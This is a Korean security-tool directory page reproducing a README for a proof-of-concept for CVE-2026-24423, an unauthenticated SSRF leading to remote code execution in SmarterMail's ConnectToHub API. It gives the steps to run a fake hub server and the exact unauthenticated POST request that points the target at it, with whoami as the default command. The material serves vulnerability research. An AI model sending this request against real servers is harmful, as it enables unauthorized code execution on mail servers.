Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24423 — CVE-2026-24423 재현 스크립트 — SmarterMail ConnectToHub의 신뢰 경계 위반으로 인한 SSRF 및 잠재적 원격 코드 실행 취약점입니다. 시뮬레이션된 Hub 서버와 취약한 API를 트리거하기 위한 지침이 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/aavamin/cve-2026-24423
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubaavamin/cve-2026-24423

CVE-2026-24423

CVE-2026-24423 재현 스크립트 — SmarterMail ConnectToHub의 신뢰 경계 위반으로 인한 SSRF 및 잠재적 원격 코드 실행 취약점입니다. 시뮬레이션된 Hub 서버와 취약한 API를 트리거하기 위한 지침이 포함되어 있습니다.

저장소 보기
816개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24423

root@kitploit:~
# CVE-2026-24423 – 재현

> ⚠️ **보안 연구 및 승인된 테스트 전용 / For security research and authorized testing only**


## 개요(Overview)

이 프로젝트는 **CVE-2026-24423** 취약점을 재현하기 위한 것입니다.  
해당 취약점은 **SmarterMail ConnectToHub** 기능에 존재하며, 근본 원인은 다음과 같습니다:

- 관리자 수준 인터페이스에 인증이 없음  
- 서버가 사용자가 지정한 Hub에 능동적으로 연결함(SSRF)  
- 외부 Hub가 반환한 데이터가 로컬 시스템 수준 작업에 직접 사용됨  

이 취약점은 **설계 수준의 신뢰 경계 위반(Trust Boundary Violation)** 에 해당하며, 궁극적으로 원격 코드 실행으로 이어질 수 있습니다.

이 저장소는 **취약점 검증 및 기술 연구 전용**이며, 무기화된 악용을 위한 것이 아닙니다.

사용 방법(Usage)

1️⃣ Hub 시뮬레이션 서비스 시작

Start Hub Simulation Server

root@kitploit:~
python3 cve-2026-24423.py

이 스크립트는 다음을 수행합니다:

  • 80 포트에서 수신 대기
  • SmarterMail Hub 인터페이스 시뮬레이션
  • SystemMount 구성을 포함한 JSON 응답 반환

2️⃣ 취약점 인터페이스 트리거

Trigger the Vulnerable API

Yakit 또는 Burp Suite를 사용하여 요청 전송:

root@kitploit:~
POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1
Host: ip:port
Content-Type: application/json

{
  "hubAddress": "http://ip",
  "oneTimePassword": "test",
  "nodeName": "victim"
}

이 인터페이스는 인증이 필요하지 않습니다. No authentication is required.


3️⃣ 재현 실패 처리

Troubleshooting

취약점 재현에 실패한 경우:

  • cve-2026-24423.py의 MountPath 매개변수를 수정하세요.

4️⃣ 재현 결과

Result

취약점 트리거에 성공하면 SmarterMail은 Hub가 반환한 데이터를 해석하며, 기본 코드는 whoami 명령만 실행합니다.

예시 스크린샷 / Example:

result


감사(Credit)

이 프로젝트는 ChatGPT에 의해 완성되었습니다.

root@kitploit:~
도구 다운로드